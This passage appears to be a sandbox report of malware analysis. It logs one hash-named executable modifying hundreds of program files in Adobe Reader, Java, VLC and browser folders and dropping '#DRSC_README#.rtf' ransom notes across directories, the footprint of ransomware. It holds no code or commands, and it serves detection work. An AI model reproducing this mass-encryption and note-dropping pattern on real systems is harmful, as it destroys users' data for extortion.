710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\kinit.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496937509.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\lv_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\java-rmi.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_radio_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\hijrah-config-umalqura.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Acrobat_visual.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\uninstall\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\core.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit-press.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\help.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RestartDisable.tiff 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\desktop_acrobat_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgePackages.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_link_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-114x114-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoSearchResults_180x160.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\nub.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-output2.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoBeta.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_TW.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\line.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification 